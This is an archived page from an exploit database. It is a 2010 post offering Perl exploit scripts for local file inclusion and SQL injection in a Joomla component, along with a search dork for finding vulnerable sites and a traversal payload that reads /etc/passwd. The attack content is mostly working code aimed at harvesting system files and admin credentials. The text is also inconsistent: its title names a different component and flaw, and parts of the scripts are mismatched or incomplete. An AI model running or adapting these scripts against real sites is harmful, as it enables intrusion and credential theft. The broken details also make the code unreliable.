Home / os / win7

[webapps / 0day] - Joomla Component com_projects LFI &

Posted on 26 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Joomla Component com_projects LFI &amp; SQL Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Joomla Component com_projects LFI &amp; SQL Vulnerability by jos_ali_joe in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>====================================================== Joomla Component com_projects LFI &amp; SQL Vulnerability ====================================================== [+]Title : Joomla Component com_calendrier RFI Vulnerability [+]Author : jos_ali_joe [+]Contact : josalijoe@yahoo.com [+]Home : http://josalijoe.wordpress.com/ ######################################################################## Dork : inurl:index.php?option=&quot;com_projects&quot; ######################################################################## [ Software Information ] ######################################################################## [+] Vendor : http://www.codegravity.com/ [+] Download : http://www.joomla.org/download.html [+] version : Joomla 1.5 [+] Vulnerability : LFI and SQL Vulnerability [+] Dork : com_projects ######################################################################## [+] Exploit: LFI ==================================================================================== http://localhost/index.php?option=com_projects&amp;controller=[ LFI ] ==================================================================================== use LWP::UserAgent; use HTTP::Request; use LWP::Simple; print &quot; ######################################################## &quot;; print &quot; # Joomla Component com_projects LFI Vulnerability # &quot;; print &quot; # by jos_ali_joe # &quot;; print &quot; ######################################################## &quot;; if (!$ARGV[0]) { print &quot;Usage: perl idc.pl [HOST] &quot;; print &quot;Example: perl idc.pl http://localhost/LFI/ &quot;;; } else { $web=$ARGV[0]; chomp $web; $iny=&quot;agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00&quot;; my $web1=$web.$iny; print &quot;$web1 &quot;; my $ua = LWP::UserAgent-&gt;new; my $req=HTTP::Request-&gt;new(GET=&gt;$web1); $doc = $ua-&gt;request($req)-&gt;as_string; if ($doc=~ /^root/moxis ){ print &quot;Web is vuln &quot;; } else { print &quot;Web is not vuln &quot;; } } #################################################################################### [+] Exploit: SQL ==================================================================================== http://localhost/index.php?option=com_projects&amp;view=project&amp;id=[ SQL ] ==================================================================================== use IO::Socket; if(@ARGV &lt; 1){ print &quot; [======================================================================== [// Joomla Component com_projects SQL Injection Exploit [// Usage: idc.pl [target] [// Example: idc.pl localhost.com [// Vuln&amp;Exp : jos_ali_joe [======================================================================== &quot;; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http://)//eg; $host = &quot;http://&quot;.$server; $port = &quot;80&quot;; $file = &quot;/index.php?option=com_projects&amp;view=project&amp;id=&quot;; print &quot;Script &lt;DIR&gt; : &quot;; $dir = &lt;STDIN&gt;; chop ($dir); if ($dir =~ /exit/){ print &quot;-- Exploit Failed[You Are Exited] &quot;; exit(); } if ($dir =~ ///){} else { print &quot;-- Exploit Failed[No DIR] &quot;; exit(); } $target = &quot;SQL Injection Exploit&quot;; $target = $host.$dir.$file.$target; #Writing data to socket print &quot;+**********************************************************************+ &quot;; print &quot;+ Trying to connect: $server &quot;; $socket = IO::Socket::INET-&gt;new(Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt; &quot;$server&quot;, PeerPort =&gt; &quot;$port&quot;) || die &quot; + Connection failed... &quot;; print $socket &quot;GET $target HTTP/1.1 &quot;; print $socket &quot;Host: $server &quot;; print $socket &quot;Accept: * /* &quot;; print $socket &quot;Connection: close &quot;; print &quot;+ Connected!... &quot;; #Getting while($answer = &lt;$socket&gt;) { if ($answer =~ /username:(.*?)pass/){ print &quot;+ Exploit succeed! Getting admin information. &quot;; print &quot;+ ---------------- + &quot;; print &quot;+ Username: $1 &quot;; } #################################################################################### Thanks : ./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha - XPanda - eL Farhatz ./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45 ./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho ./Me Family ATeN4 : ./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe Greets For : ./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber My Team : ./Indonesian Coder # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>

 

TOP